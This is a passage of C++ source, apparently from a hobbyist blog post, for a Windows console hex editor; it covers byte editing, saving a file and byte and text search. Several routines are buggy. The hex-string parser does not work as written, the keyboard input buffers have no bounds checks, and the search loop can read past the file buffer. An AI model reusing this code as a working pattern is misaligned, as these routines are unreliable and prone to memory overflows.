            if (c > 0x19 && c < 0x7F) {
                edit[selected].data = c;
                fileByte[selected] = c;
                editMode = false;
                return;
            } else {
                editMode = false;
                return;
            }
        }
    }
     
    void HexEditor::save() {
        OPENFILENAME ofn;
        char sfilePath[255];
        ZeroMemory(&ofn,sizeof(ofn));
        ofn.lStructSize = sizeof(OPENFILENAME);
        ofn.lpstrFilter = "All Files (*.*)\0*.*\0";
        ofn.lpstrFile = sfilePath;
        ofn.nMaxFile = 255;
        ofn.Flags = OFN_EXPLORER | OFN_PATHMUSTEXIST;
        ofn.lpstrInitialDir = completePath;
        ofn.lpstrDefExt = "";
        if (GetSaveFileName(&ofn)) {
            FILE *fp = fopen(sfilePath,"wb");
            fwrite(fileByte,fsize,1,fp);
            fclose(fp);
        }
    }
     
    void HexEditor::findbytes(Console *g) {
        char texBuf[255],text[64],bytes[24];
        memset(text,'\0',64);
        short currLen = 0;
        sprintf(texBuf,"Please enter bytes to find(FORMAT=0x??,0x??)->");
        g->clear();
        g->write(0,23,"Press escape to exit find",FOREGROUND_GREEN|BACKGROUND_BLUE);
        g->write(0,24,texBuf,FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_BLUE|FOREGROUND_INTENSITY|BACKGROUND_BLUE);
        draw(g);
        g->render();
        bool end = false;
        char in;
        while (!end) {
            in = getch();
            if (in == VK_ESCAPE) {
                end = true;
            } else {
                if (in == VK_BACK) {
                    if (currLen != 0) {
                        text[currLen-1] = '\0';
                        currLen--;
                    }
                } else {
                    if (in != VK_RETURN) {
                        text[currLen] = in;
                        currLen++;
                    }
                }
                sprintf(texBuf,"Please enter bytes to find(FORMAT=0x??,0x??)->%s",text);
                if (currLen%5 == 0) {
                    converttobytes(bytes,text);
                    findandselect(bytes);
                }
                g->clear();
                g->write(0,23,"Press escape to exit find",FOREGROUND_GREEN|BACKGROUND_BLUE);
                g->write(0,24,texBuf,FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_BLUE|FOREGROUND_INTENSITY|BACKGROUND_BLUE);
                draw(g);
                g->render();
            }
        }
    }
     
    void HexEditor::converttobytes(char *bytebuf, const char* text) {
        short currByte = 0,currBB = 0;
        char currBytebuf[4];
        int sLen = strlen(text);
        for (int i = 0; i < sLen; i++) {
            if (text[i] != ',') {
                currBytebuf[currByte] = text[i];
            } else {
                currByte = 0;
                int in;
                sscanf(text,"%x",&in);
                bytebuf[currBB] = (char)in;
                currBB++;
            }
        }
    }
     
    void HexEditor::findtext(Console *g) {
        char texBuf[255],text[64];
        memset(text,'\0',64);
        short currLen = 0;
        sprintf(texBuf,"Please enter text to find->");
        g->clear();
        g->write(0,23,"Press escape to exit find",FOREGROUND_GREEN|BACKGROUND_BLUE);
        g->write(0,24,texBuf,FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_BLUE|FOREGROUND_INTENSITY|BACKGROUND_BLUE);
        draw(g);
        g->render();
        bool end = false;
        char in;
        while (!end) {
            in = getch();
            if (in == VK_ESCAPE) {
                end = true;
            } else {
                if (in == VK_BACK) {
                    if (currLen != 0) {
                        text[currLen-1] = '\0';
                        currLen--;
                    }
                } else {
                    if (in != VK_RETURN) {
                        text[currLen] = in;
                        currLen++;
                    }
                }
                sprintf(texBuf,"Please enter text to find->%s",text);
                findandselect(text);
                g->clear();
                g->write(0,23,"Press escape to exit find",FOREGROUND_GREEN|BACKGROUND_BLUE);
                g->write(0,24,texBuf,FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_BLUE|FOREGROUND_INTENSITY|BACKGROUND_BLUE);
                draw(g);
                g->render();
            }
        }
    }
     
    void HexEditor::find(Console* g) {
        switch (mode) {
            case 0:
                findbytes(g);
                break;
            case 1:
                findtext(g);
                break;
        }
    }
     
    void HexEditor::findandselect(const char *find) {
        char fBuf[64];
        memset(fBuf,'\0',64);
        int flen = strlen(find);
        for (lc = selected; lc < fsize; lc++) {
            for (int i = 0; i < flen; i++) {
                fBuf[i] = fileByte[lc+i];
            }
            if (!strcmp(fBuf,find)) {
                selected = lc;
                if ((lc-288)/16 < 0) {
                    sTimes = 0;
                } else {
                    sTimes = (lc-288)/16;
                }
                return;
            }
        }
    }


Author at
Subscribe to: Posts (Atom)